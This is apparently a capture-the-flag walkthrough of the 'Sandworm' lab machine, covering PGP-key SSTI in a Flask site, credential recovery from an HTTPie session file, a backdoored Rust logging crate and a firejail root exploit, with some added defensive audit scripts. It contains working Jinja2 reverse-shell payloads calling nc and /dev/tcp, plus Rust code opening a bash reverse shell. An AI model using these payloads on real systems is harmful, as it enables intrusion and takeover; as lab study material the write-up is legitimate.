## User Flag
### NMAP Scan
```shell
sudo nmap 10.10.11.218 -sC -sV
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-24 13:20 MDT
Nmap scan report for ssa.htb (10.10.11.218)
Host is up (0.14s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://ssa.htb/
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Secret Spy Agency | Secret Security Service
| ssl-cert: Subject: commonName=SSA/organizationName=Secret Spy Agency/stateOrProvinceName=Classified/countryName=SA
| Not valid before: 2023-05-04T18:03:25
|_Not valid after: 2050-09-19T18:03:25
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.08 seconds
```
### Initial Enumeration
From the nmap scan I can see that this server has ports `80, 443` open, meaning it is most likely a web server. Navigating to https://10.10.11.218 gives us a webpage for the Secret Spy Agency.
![[Pasted image 20230824132534.png]]
I see that there is an About and a Contact page. On the About page there is some information about the fictional Secret Spy Agency, but nothing useful. On the Contact page there is a box to enter a PGP encrypted message, with a link to a guide page to learn about PGP.
![[Pasted image 20230824133554.png]]
On this guide page there are a few boxes to test out PGP encryption, decryption and signing.
![[Pasted image 20230824133852.png]]
There is a link to view the SSA's public key for use in sending them messages.
```shell
-----BEGIN PGP PUBLIC KEY BLOCK-----
...
=P8U3
-----END PGP PUBLIC KEY BLOCK-----
```
All of this information hints at some sort of injection vulnerability. Of course this will require more testing.
### Testing out PGP
Using this key I was able to start testing the various PGP boxes on the website. I first wanted to test the decryption box. To accomplish this I needed to create a private PGP key and use the SSA public key to encrypt a message that they could decrypt.
I initially ran into problems with getting any program to recognize the SSA public key. [CyberChef](https://gchq.github.io/CyberChef/) has the ability to do PGP decryption/encryption. However, it could not recognize the SSA public key. I had to use a program called [GNU Privacy Assistant](https://www.gnupg.org/related_software/gpa/index.html) which was able to recognize the public key. Using this program I encrypted a message with their public key and tested it out on the site.
![[Pasted image 20230824140823.png]]
It worked! I went through and tested the other boxes, getting a message to decrypt with my private key and verifying that I had signed a message correctly. All of them produced successful results but didn't return anything obvious for exploitation.
I also tried just encrypting a reverse shell to see if it would be that easy. However, that did not work.
### Directory Enumeration
I decided to try and enumerate directories and see if anything hidden or not linked showed up.
```shell
gobuster dir -u https://ssa.htb -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://ssa.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/about (Status: 200) [Size: 5584]
/contact (Status: 200) [Size: 3543]
/guide (Status: 200) [Size: 9043]
/view (Status: 302) [Size: 225] [--> /login?next=%2Fview]
/admin (Status: 302) [Size: 227] [--> /login?next=%2Fadmin]
/login (Status: 200) [Size: 4392]
/process (Status: 405) [Size: 153]
/logout (Status: 302) [Size: 229] [--> /login?next=%2Flogout]
/pgp (Status: 200) [Size: 3187]
```
I saw that there was a login page and a page called process. Navigating to the login page prompts for user credentials.
### Testing Directories
#### Login Page
![[Pasted image 20230824151057.png]]
Trying out possible default credentials, such as: `admin:admin`, `admin:password`, `admin:Password123!`, etc. doesn't work.
#### Process Page
I decided to look at the process page. Navigating to https://10.10.11.218/process shows this result.
![[Pasted image 20230824151415.png]]
This says to me that it is some sort of program looking for properly formatted data, such as a specific API call. Inspecting the source in Firefox and going to the debugger tab, we can see what gets posted to the server.
```javascript
$(function () {
  $('[data-toggle="tooltip"]').tooltip()
});
$(document).ready(function() {
  $(".verify-form").submit(function(e) {
    e.preventDefault();
    var signed_text = $("#signed_text").val();
    var public_key = $("#public_key").val();
    $.ajax({
      type: "POST",
      url: "/process",
      data: { signed_text: signed_text, public_key: public_key },
      success: function(result) {
        $("#signature-result").html(result);
        $("#signature-modal").modal("show");
      }
    });
  });
  $("#signature-modal .btn-secondary").click(function() {
    $("#signature-modal").modal("hide");
  });
});
```
This showed me that the signed message verification box uses the process page to do the work. This seems like a valuable route to research. First I have to generate a PGP key, which I can do using [[gpg]].
### Further Testing out PGP
```shell
gpg --gen-key
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
gpg: keybox '/home/cwalker/.gnupg/pubring.kbx' created
Note: Use "gpg --full-generate-key" for a full featured key generation dialog.
GnuPG needs to construct a user ID to identify your key.
Real name: Charlie
Email address: [email protected]
You selected this USER-ID:
"Charlie <[email protected]>"
Change (N)ame, (E)mail, or (O)kay/(Q)uit? O
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
gpg: /home/cwalker/.gnupg/trustdb.gpg: trustdb created
gpg: directory '/home/cwalker/.gnupg/openpgp-revocs.d' created
gpg: revocation certificate stored as '/home/cwalker/.gnupg/openpgp-revocs.d/D4A5E742FC5C0D22DE92CDEB02A3185A4E04943E.rev'
public and secret key created and signed.
pub rsa3072 2023-09-11 [SC] [expires: 2025-09-10]
D4A5E742FC5C0D22DE92CDEB02A3185A4E04943E
uid Charlie <[email protected]>
sub rsa3072 2023-09-11 [E] [expires: 2025-09-10]
```
Now that I have the key generated I can use it to sign a message and have the site test the verification. I first have to export my public key with this command:
```shell
gpg --armor --export [email protected] > pub_key.asc
```
Next I create the message file and clear-sign it with my new key:
```shell
echo "Hello this is a test" > message.txt
gpg --clear-sign --output signed.asc message.txt
```
Saved in the file `signed.asc` is the signed text:
```shell
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Hello this is a test
-----BEGIN PGP SIGNATURE-----
...
=72ea
-----END PGP SIGNATURE-----
```
I enter the exported public key and the signed message into the verification boxes.
![[Pasted image 20230911175200.png]]
Clicking the `Verify Signature` button shows me this message:
![[Pasted image 20230911175316.png]]
### Exploiting PGP and Flask
I see that the verification successfully used my keys. I searched for how to exploit this. Searching for vulnerabilities in GnuPG didn't return anything useful, so I decided to research Flask, the framework the site said it was powered by.
After googling for [Flask](https://flask.palletsprojects.com/en/2.3.x/) vulnerabilities and for Flask PGP exploits, I came across [Exploit Notes](https://exploit-notes.hdks.org/exploit/web/framework/python/flask-jinja2-pentesting/), which has a listing for Server Side Template Injection (SSTI) that abuses Jinja2 template syntax. I found a way to test for the possibility of an SSTI on the site.
![[Pasted image 20230911183835.png]]
#### Testing SSTI Vulnerability
I decided to put the test expression in both the message and the real name. The email address didn't seem possible as it needs to be in an email address format. I deleted the previous keys to keep things simple:
```shell
gpg --delete-keys [email protected]
gpg --delete-secret-keys [email protected]
```
```shell
gpg --gen-key
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Note: Use "gpg --full-generate-key" for a full featured key generation dialog.
GnuPG needs to construct a user ID to identify your key.
Real name: {{4*2}}
Email address: [email protected]
You selected this USER-ID:
"{{4*2}} <[email protected]>"
Change (N)ame, (E)mail, or (O)kay/(Q)uit? o
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
gpg: revocation certificate stored as '/home/cwalker/.gnupg/openpgp-revocs.d/37E85FA3EEED5F51710D981AD00EF6A2629190D5.rev'
public and secret key created and signed.
pub rsa3072 2023-09-12 [SC] [expires: 2025-09-11]
37E85FA3EEED5F51710D981AD00EF6A2629190D5
uid {{4*2}} <[email protected]>
sub rsa3072 2023-09-12 [E] [expires: 2025-09-11]
```
```shell
echo "{{3*2}}" > message.txt
```
`NOTE: I used different multiplications to determine which field was vulnerable`
I generated the signed message and exported the public key. Entering the new values to test for SSTI, I get this response.
![[Pasted image 20230911185052.png]]
As we can see, the server evaluated our expression in the name field but not in the message field, which was expected. Now we know we can use this field to get a reverse shell.
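From the defender's side, the bug is that the signer's user ID (the name gpg extracts from the uploaded public key) ends up in the template source rather than being passed to the template as data. The following is an added example, not code from the writeup or from the box's application: it parses constructed `gpg --with-colons` style records (field 10 of each `uid` line is the user ID, with `:` escaped as `\x3a`), flags user IDs that carry Jinja2 delimiters, and renders the result with a constant template so that an expression such as `{{4*2}}` stays literal text. The `render_result` substitution stands in for Flask's `render_template_string(RESULT_TEMPLATE, uid=uid)` so that the example runs without Jinja2 installed; the fingerprints and hashes in the sample are made up.

```python
import html
import re

# Constructed sample of `gpg --with-colons` output for an imported key whose
# first user ID carries a template expression (fingerprints/hashes are made up).
SAMPLE_COLON_OUTPUT = """\
pub:u:3072:1:0000000000000001:1694476800:1757548800::u:::scESC::::::23::0:
fpr:::::::::0000000000000000000000000000000000000001:
uid:u::::1694476800::AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA::{{4*2}} <test@example.com>::::::::::0:
uid:u::::1694476800::BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB::Charlie <charlie@example.com>::::::::::0:
"""

# Jinja2 expression, statement and comment openers.
TEMPLATE_DELIMITERS = re.compile(r"\{\{|\{%|\{#")

# The template source is a constant; the user ID is only ever substituted as data.
RESULT_TEMPLATE = "Signature is valid for {{ uid }}!"


def parse_uids(colon_output):
    """Return the decoded user-ID strings from gpg --with-colons records."""
    uids = []
    for line in colon_output.splitlines():
        fields = line.split(":")
        if fields[0] == "uid" and len(fields) > 9:
            # gpg escapes ':' inside the user ID as '\x3a'.
            uids.append(fields[9].replace("\\x3a", ":"))
    return uids


def contains_template_syntax(text):
    """True if the text contains Jinja2 delimiters; useful as a detection signal."""
    return TEMPLATE_DELIMITERS.search(text) is not None


def render_result(uid):
    """Safe pattern: substitute the uid into a fixed template as escaped data.
    Stand-in for render_template_string(RESULT_TEMPLATE, uid=uid); the uid is
    never concatenated into the template source, so {{4*2}} is not evaluated."""
    return RESULT_TEMPLATE.replace("{{ uid }}", html.escape(uid))


def process_verification(colon_output):
    """Hardened /process logic (hypothetical): reject user IDs that look like
    template code and log-worthy, otherwise render every uid as plain data."""
    uids = parse_uids(colon_output)
    suspicious = [u for u in uids if contains_template_syntax(u)]
    if suspicious:
        return {"status": "rejected", "reason": "template syntax in user ID", "uids": suspicious}
    return {"status": "ok", "rendered": [render_result(u) for u in uids]}


if __name__ == "__main__":
    print(process_verification(SAMPLE_COLON_OUTPUT))
```

The rejection is a detection aid rather than the fix: even if the check were bypassed, `render_result` keeps the template source constant, which is what actually closes the SSTI.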
#### Using Exploit for Reverse Shell
On the Exploit Notes site we can see there are templates for reverse shells.
```python
{{config.__class__.__init__.__globals__['os'].popen('mkfifo /tmp/ZTQ0Y; nc 10.0.0.1 443 0</tmp/ZTQ0Y | /bin/sh >/tmp/ZTQ0Y 2>&1; rm /tmp/ZTQ0Y').read()}}
{{ request|attr('application')|attr('__globals__')|attr('__getitem__')('__builtins__')|attr('__getitem__')('__import__')('os')|attr('popen')('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f')|attr('read')() }}
# Filter bypass - Base64 encode
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMy8xMjM0IDA+JjE=" | base64 -d | bash').read() }}
```
To be safe I decided to use the base64-encoded reverse shell, in case there is a filter that would prevent the payload from being read properly. I used [Reverse Shell Generator](https://www.revshells.com/) to generate my shell and encode it.
I start a listener using [[Pwncat-CS]].
![[Pasted image 20230911190411.png]]
Usually [[Pwncat-CS]] will automatically upgrade a shell, but sometimes the commands won't work and you will still have a non-upgraded shell.
### Investigating Reverse Shell
The shell was successful! We can see that we are now the user atlas. When investigating a new reverse shell, I like to explore the user's home directory for files of interest.
Looking in the home directory of atlas I saw `.config` and decided to investigate.
```shell
$ ls -al
total 44
drwxr-xr-x 8 atlas atlas 4096 Jun 7 13:44 .
drwxr-xr-x 4 nobody nogroup 4096 May 4 15:19 ..
lrwxrwxrwx 1 nobody nogroup 9 Nov 22 2022 .bash_history -> /dev/null
-rw-r--r-- 1 atlas atlas 220 Nov 22 2022 .bash_logout
-rw-r--r-- 1 atlas atlas 3771 Nov 22 2022 .bashrc
drwxrwxr-x 2 atlas atlas 4096 Jun 6 08:49 .cache
drwxrwxr-x 3 atlas atlas 4096 Feb 7 2023 .cargo
drwxrwxr-x 4 atlas atlas 4096 Jan 15 2023 .config
drwx------ 4 atlas atlas 4096 Sep 12 01:11 .gnupg
drwxrwxr-x 6 atlas atlas 4096 Feb 6 2023 .local
-rw-r--r-- 1 atlas atlas 807 Nov 22 2022 .profile
drwx------ 2 atlas atlas 4096 Feb 6 2023 .ssh
```
Inside the config directory we find two additional directories:
```shell
$ ls
firejail
httpie
```
I decided to go down `httpie` first, but I believe `firejail` will be needed or useful later. In the `httpie` directory we find a config file called `admin.json`:
```shell
cat admin.json
{
"__meta__": {
"about": "HTTPie session file",
"help": "https://httpie.io/docs#sessions",
"httpie": "2.6.0"
},
"auth": {
"password": "quietLiketheWind22",
"type": null,
"username": "silentobserver"
},
"cookies": {
"session": {
"expires": null,
"path": "/",
"secure": false,
"value": "eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIkludmFsaWQgY3JlZGVudGlhbHMuIl19XX0.Y-I86w.JbELpZIwyATpR58qg1MGJsd6FkA"
}
},
"headers": {
"Accept": "application/json, */*;q=0.5"
}
}
```
We now have the login for a user: `silentobserver:quietLiketheWind22`
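Two things in that session file are worth a defender's attention: HTTPie stores the `auth` password in plaintext, and the saved `session` cookie is a Flask session, which is signed but not encrypted, so its contents are readable by anyone holding the file. The following is an added example, not code from the writeup: it audits a constructed HTTPie 2.x session file (same layout as the one above, password replaced by a placeholder) and decodes the Flask session payload without the secret key; `encode_unsigned_payload` is a hypothetical helper that builds the payload segment only, with placeholder timestamp and signature, so the compressed variant can be exercised.

```python
import base64
import json
import zlib

# Constructed HTTPie session file mirroring the layout found on the box.
# The password is a placeholder; the cookie value is the one shown above.
SAMPLE_SESSION_JSON = json.dumps({
    "__meta__": {"about": "HTTPie session file", "help": "https://httpie.io/docs#sessions", "httpie": "2.6.0"},
    "auth": {"password": "placeholder-not-the-real-one", "type": None, "username": "silentobserver"},
    "cookies": {
        "session": {
            "expires": None, "path": "/", "secure": False,
            "value": "eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIkludmFsaWQgY3JlZGVudGlhbHMuIl19XX0.Y-I86w.JbELpZIwyATpR58qg1MGJsd6FkA",
        }
    },
    "headers": {"Accept": "application/json, */*;q=0.5"},
})


def decode_flask_session(cookie):
    """Read a Flask session cookie's payload WITHOUT checking its signature.
    Layout: [.]<base64url payload>.<timestamp>.<signature>; a leading '.'
    means the payload was zlib-compressed. Reading needs no key; only
    forging a cookie needs the application's secret key."""
    compressed = cookie.startswith(".")
    if compressed:
        cookie = cookie[1:]
    payload = cookie.split(".")[0]
    raw = base64.urlsafe_b64decode(payload + "=" * (-len(payload) % 4))
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw)


def encode_unsigned_payload(obj, compress=False):
    """Hypothetical helper: inverse of decode_flask_session for the payload
    segment only; timestamp and signature are placeholders."""
    raw = json.dumps(obj, separators=(",", ":")).encode()
    if compress:
        raw = zlib.compress(raw)
    enc = base64.urlsafe_b64encode(raw).rstrip(b"=").decode()
    return ("." if compress else "") + enc + ".<timestamp>.<signature>"


def audit_httpie_session(text):
    """Return human-readable findings for one HTTPie session file."""
    session = json.loads(text)
    findings = []
    auth = session.get("auth") or {}
    if auth.get("password"):
        findings.append(f"plaintext password stored for user {auth.get('username')!r}")
    for name, cookie in (session.get("cookies") or {}).items():
        if not cookie.get("secure", False):
            findings.append(f"cookie {name!r} saved without the Secure flag")
        if name == "session":
            try:
                keys = sorted(decode_flask_session(cookie["value"]))
                findings.append(f"cookie 'session' is a readable Flask session: keys={keys}")
            except (ValueError, zlib.error):
                pass  # not a Flask-style payload; nothing more to say
    return findings


if __name__ == "__main__":
    for finding in audit_httpie_session(SAMPLE_SESSION_JSON):
        print(finding)
```

Running it against real session files under `~/.config/httpie/sessions/` tells you which stored credentials need rotating; here the decoded session only holds a flashed "Invalid credentials." message, but the same decode would expose anything else an application puts in the session.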
I used pwncat to SSH to the machine in order to simplify uploads and downloads.
![[Pasted image 20230911192456.png]]
From there I found the user flag in the home directory!
## Root Flag
### Initial Enumeration
Using pwncat I am able to upload linpeas and pspy64 to run on the system.
![[Pasted image 20230912125830.png]]
Linpeas returned a couple of interesting results, one of them flagged as a 95% chance of privilege escalation. We will investigate this one first.
![[Pasted image 20230912130742.png]]
![[Pasted image 20230912130614.png]]
```shell
(remote) silentobserver@sandworm:/home/silentobserver/.local/bin$ ls -al
total 12
drwxrwxr-x 2 silentobserver silentobserver 4096 Nov 22 2022 .
drwx------ 4 silentobserver silentobserver 4096 Nov 22 2022 ..
-rwxrwxr-x 1 silentobserver silentobserver 208 Nov 22 2022 flask
```
There is nothing interesting inside this folder except for the application the site is run on; it doesn't look like this will lead to anything. Investigating the files with the SUID bit set looks more promising: I see tipnet and firejail. I remember firejail from the configs in atlas's home directory. Googling [firejail](https://firejail.wordpress.com), I find the homepage and can see that it is a security sandbox, which is probably what I landed in with the initial reverse shell.
![[Pasted image 20230912132956.png]]
### SUID Investigation
From the linpeas output I can see that the SUID bit is set and the owner is root. This means that no matter who starts the program, it runs as root. However, when launching it as silentobserver I get the following error:
```shell
$ /usr/local/bin/firejail
-bash: /usr/local/bin/firejail: Permission denied
```
From the linpeas output I can see that only root or members of the jailer group can execute it. The contents of `/etc/group` show us that atlas is a member of the jailer group.
```shell
$ cat /etc/group
---SNIP---
jailer:x:1002:atlas
mysql:x:120:
silentobserver:x:1001:
atlas:x:1000:
_laurel:x:997:
```
Attempting to run firejail from inside the security sandbox that we landed in as the atlas user doesn't work, for obvious reasons. Of course, we also need to know how to exploit this to gain a root shell.
After a quick google for Firejail exploits, I found a [vulnerability](https://www.openwall.com/lists/oss-security/2022/06/08/10) that abuses a feature of the program to gain a root shell. Now that I have the exploit, I need a way to get access to the user atlas outside of the sandbox. I decided to investigate tipnet and see if there are any useful routes for exploitation.
### Tipnet Investigation
![[Pasted image 20230912135813.png]]
I can see that there are a few options to choose from. After running through all of them, only `a` and `e` produce output; the others all state that they are works in progress.
#### Option a
![[Pasted image 20230914081208.png]]
#### Option e
![[Pasted image 20230914081313.png]]
When selecting option a I get a bunch of messages, but there is no useful information in them that would point me to an exploit. Option e does not provide any useful info either. I want to explore the tipnet folder some more to see if there is anything that might point me towards a possible exploit.
In the folder there is a file called tipnet.d. When I cat it out I get this:
![[Pasted image 20230915065300.png]]
### Tipnet Exploitation
It seems to be a configuration file for tipnet, and these packages are run every time tipnet is run. Running `ls -al` shows that I am able to write to `lib.rs`, which could be a possible exploit path.
![[Pasted image 20230915070110.png]]
```shell
cat /opt/crates/logger/src/lib.rs
```
```rust
extern crate chrono;
use std::fs::OpenOptions;
use std::io::Write;
use chrono::prelude::*;

pub fn log(user: &str, query: &str, justification: &str) {
    let now = Local::now();
    let timestamp = now.format("%Y-%m-%d %H:%M:%S").to_string();
    let log_message = format!("[{}] - User: {}, Query: {}, Justification: {}\n", timestamp, user, query, justification);
    let mut file = match OpenOptions::new().append(true).create(true).open("/opt/tipnet/access.log") {
        Ok(file) => file,
        Err(e) => {
            println!("Error opening log file: {}", e);
            return;
        }
    };
    if let Err(e) = file.write_all(log_message.as_bytes()) {
        println!("Error writing to log file: {}", e);
    }
}
```
The file extension `.rs` tells me that it is a Rust file. Catting it out, it seems to just log tipnet actions. While exploring, I have another terminal running pspy64 and I see that every 2 minutes the Rust compiler runs.
![[Pasted image 20230915074932.png]]
This combined with the editable rust file might mean that I am able to provide my own rust code to run instead of the logging. I decided to google for a Rust reverse shell and found one on [GitHub](https://gist.github.com/GugSaas/512fc84ef1d5aefec4c38c2448935b01).
```rust
// I couldn't find the owner of the exploit, anyone who knows can comment so I can give the credits ;)
extern crate chrono;
use std::fs::OpenOptions;
use std::io::Write;
use chrono::prelude::*;
use std::process::Command;

pub fn log(user: &str, query: &str, justification: &str) {
    // Spawn the reverse shell first, then fall through to the original logging.
    let command = "bash -i >& /dev/tcp/10.10.16.4/1235 0>&1";
    let output = Command::new("bash")
        .arg("-c")
        .arg(command)
        .output()
        .expect("not work");
    if output.status.success() {
        let stdout = String::from_utf8_lossy(&output.stdout);
        let stderr = String::from_utf8_lossy(&output.stderr);
        println!("standard output: {}", stdout);
        println!("error output: {}", stderr);
    } else {
        let stderr = String::from_utf8_lossy(&output.stderr);
        eprintln!("Error: {}", stderr);
    }
    let now = Local::now();
    let timestamp = now.format("%Y-%m-%d %H:%M:%S").to_string();
    let log_message = format!("[{}] - User: {}, Query: {}, Justification: {}\n", timestamp, user, query, justification);
    let mut file = match OpenOptions::new().append(true).create(true).open("log.txt") {
        Ok(file) => file,
        Err(e) => {
            println!("Error opening log file: {}", e);
            return;
        }
    };
    if let Err(e) = file.write_all(log_message.as_bytes()) {
        println!("Error writing to log file: {}", e);
    }
}
```
Adding this reverse shell to `lib.rs` and waiting for the compiler to run allows us to gain the reverse shell. Watching pspy64 I saw that Rust started to compile and my shell came in shortly after. I am now the user `atlas`.
![[Pasted image 20230915080433.png]]
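Both escalation steps in this section come down to file mode bits: a setuid-root binary reachable by a group (the firejail finding from the SUID section) and a source file that a low-privileged user can write while a scheduled job compiles and runs it (the `lib.rs` finding). The following is an added example, not code from the writeup or from the box: a small audit that walks a directory tree and reports setuid files and files writable by group or others, using `lstat` mode bits rather than `os.access` so that the result does not depend on who runs it. `build_demo_tree` constructs a throwaway layout modelled on `/opt/crates/logger/src/lib.rs` and a setuid helper in a temporary directory; the paths and modes are hypothetical.

```python
import os
import stat
import tempfile


def classify_path(path):
    """Return findings for one filesystem entry, judged purely from its mode bits."""
    st = os.lstat(path)
    findings = []
    if stat.S_ISLNK(st.st_mode):
        return findings  # symlink modes are meaningless; the target is audited on its own
    if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
        findings.append(f"setuid (owner uid {st.st_uid}, mode {stat.filemode(st.st_mode)})")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("writable by group or others")
    return findings


def audit_tree(root):
    """Map of relative path -> findings for every regular file under root."""
    results = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            findings = classify_path(path)
            if findings:
                results[os.path.relpath(path, root)] = findings
    return results


def build_demo_tree():
    """Constructed layout (hypothetical paths) with one writable source file,
    one clean source file and one setuid helper that only owner/group may run."""
    root = tempfile.mkdtemp(prefix="perm-audit-demo-")
    os.makedirs(os.path.join(root, "crates", "logger", "src"))
    os.makedirs(os.path.join(root, "bin"))
    files = {
        "crates/logger/src/lib.rs": (b"pub fn log() {}\n", 0o664),   # group-writable: the condition abused above
        "crates/logger/src/main.rs": (b"fn main() {}\n", 0o644),     # owner-writable only: fine
        "bin/helper": (b"#!/bin/sh\nexit 0\n", 0o4750),              # setuid, executable only by owner and group
    }
    for rel, (content, mode) in files.items():
        path = os.path.join(root, rel)
        with open(path, "wb") as fh:
            fh.write(content)
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    for rel, findings in sorted(audit_tree(build_demo_tree()).items()):
        print(f"{rel}: {'; '.join(findings)}")
```

Pointed at a real `/opt` or `/usr/local/bin`, the writable-source finding is the one to pair with a look at cron and systemd timers: a file that is both group-writable and compiled or executed on a schedule by a more privileged account is the same pattern the box exposed.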
### Exploit Firejail
Now that I am atlas, a member of the jailer group, I can run firejail and, crucially, the firejail exploit that should give me root access. I copied the exploit that I found earlier from [Openwall](https://www.openwall.com/lists/oss-security/2022/06/08/10/1) and created the `firejail.py` file in atlas's home directory.
After running the exploit I see that it gives me a command to run in another shell.
![[Pasted image 20230915135913.png]]
I press `Ctrl + Z` to background the exploit process and enter the command it printed. Once I am in that shell I run `su -` and I now have a root shell.
![[Pasted image 20230915140056.png]]
I have the root flag now and the system is conquered.